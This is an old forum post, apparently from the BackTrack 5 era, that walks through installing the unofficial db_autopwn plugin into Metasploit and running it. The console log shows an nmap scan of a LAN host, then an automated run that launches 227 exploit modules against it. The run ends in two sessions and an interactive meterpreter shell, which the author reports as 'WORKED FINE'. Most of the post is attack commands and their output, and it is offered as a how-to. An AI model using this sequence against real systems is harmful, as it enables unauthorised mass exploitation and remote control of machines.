hi,guys
if you want to use not total function of "ex"db_autopwn in metasploit 4.2.0-dev bt5r1
go here:
https://raw.github.com/neinwechter/m.../db_autopwn.rb
copy & paste the script
rename db_autopwn.rb
mv the script in /opt/framework/msf3/plugins/
chmod +x db_autopwn.rb

now
root@bt:~# cd /pentest/exploits/framework
root@bt:/pentest/exploits/framework# ruby1.8 msfconsole -q
msf > db_driver[*] Active Driver: postgresql[*] Available: postgresql
msf > /etc/init.d/postgresql-8.4 start[*] exec: /etc/init.d/postgresql-8.4 start ####i've installed postgresql-8.4 (method first BT5)
msf > workspace MyProject[*] Workspace: MyProject
msf > load /opt/framework/msf3/plugins/db_autopwn.rb[*] Successfully loaded plugin: db_autopwn
msf > ?

db_autopwn Commands
===================

Command Description
------- -----------
db_autopwn Automatically exploit everything


Core Commands
=============

Command Description
------- -----------
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
.................................................. ..................................
.................................................. ...........
msf > db_nmap 192.168.1.165[*] Nmap: Starting Nmap 5.61TEST2 ( http://nmap.org ) at 2011-12-30 17:28 CET[*] Nmap: Nmap scan report for HACKDANY.homenet.telecomitalia.it (192.168.1.165)[*] Nmap: Host is up (0.0015s latency).[*] Nmap: Not shown: 992 closed ports[*] Nmap: PORT STATE SERVICE[*] Nmap: 80/tcp open http[*] Nmap: 135/tcp open msrpc[*] Nmap: 139/tcp open netbios-ssn[*] Nmap: 443/tcp open https[*] Nmap: 445/tcp open microsoft-ds[*] Nmap: 3306/tcp open mysql[*] Nmap: 5800/tcp open vnc-http[*] Nmap: 5900/tcp open vnc[*] Nmap: MAC Address: 08:00:27:F1:F2:8F (Cadmus Computer Systems)[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds
msf > db_autopwn -p -e -q -R great
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it's current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-] [*] (1/227 [0 sessions]): Launching exploit/windows/iis/ms01_026_dbldecode against 192.168.1.165:80...[*] (2/227 [0 sessions]): Launching exploit/unix/webapp/coppermine_piceditor against 192.168.1.165:80...[*] (3/227 [0 sessions]): Launching exploit/windows/http/ca_totaldefense_regeneratereports against 192.168.1.165:443...[*] (4/227 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_main against 192.168.1.165:80...[*] (5/227 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil against 192.168.1.165:443...[*] (6/227 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.165:139...[*] (7/227 [0 sessions]): Launching exploit/unix/http/lifesize_room against 192.168.1.165:80...[*] (8/227 [0 sessions]): Launching exploit/windows/http/sapdb_webtools against 192.168.1.165:80...[*] (9/227 [0 sessions]): Launching exploit/unix/webapp/dogfood_spell_exec against 192.168.1.165:443...[*] (10/227 [0 sessions]): Launching exploit/multi/http/freenas_exec_raw against 192.168.1.165:443...[*] (11/227 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.1.165:445...[*] (12/227 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.1.165:139...[*] (13/227 [0 sessions]): Launching exploit/windows/http/ca_arcserve_rpc_authbypass against 192.168.1.165:80...[*] (14/227 [0 sessions]): Launching exploit/multi/http/glassfish_deployer against 192.168.1.165:80...[*] (15/227 [0 sessions]): Launching exploit/windows/iis/iis_webdav_upload_asp against 192.168.1.165:80...[*] (16/227 [0 sessions]): Launching exploit/windows/http/apache_mod_rewrite_ldap against 192.168.1.165:443...[*] (17/227 [0 sessions]): Launching exploit/windows/mssql/mssql_payload_sqli against 192.168.1.165:80...[*] (18/227 [0 sessions]): Launching exploit/windows/http/efs_easychatserver_username against 192.168.1.165:443...[*] (19/227 [0 sessions]): Launching exploit/windows/http/hp_nnm_webappmon_ovjavalocale against 192.168.1.165:443...[*] (20/227 [0 sessions]): Launching exploit/windows/http/fdm_auth_header against 192.168.1.165:80...[*] (21/227 [0 sessions]): Launching exploit/unix/webapp/generic_exec against 192.168.1.165:443...[*] (22/227 [0 sessions]): Launching exploit/windows/http/coldfusion_fckeditor against 192.168.1.165:80...[*] (23/227 [0 sessions]): Launching exploit/windows/http/zenworks_uploadservlet against 192.168.1.165:443...[*] (24/227 [0 sessions]): Launching exploit/windows/http/hp_nnm_ovalarm_lang against 192.168.1.165:443...[*] (25/227 [0 sessions]): Launching exploit/unix/webapp/openview_connectednodes_exec against 192.168.1.165:443...[*] (26/227 [0 sessions]): Launching exploit/linux/http/piranha_passwd_exec against 192.168.1.165:80...[*] (27/227 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli against 192.168.1.165:443...
.................................................. ..........................................
.................................................. .................................
*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...[*] (227/227 [2 sessions]): Waiting on 1 launched modules to finish execution...

msf > sessions -i 1[*] Starting interaction with 1...

meterpreter > WORKED FINE

PS :the FUNCTION """"" -I """""""""for the range targets dont work!!!!
regards zimmaro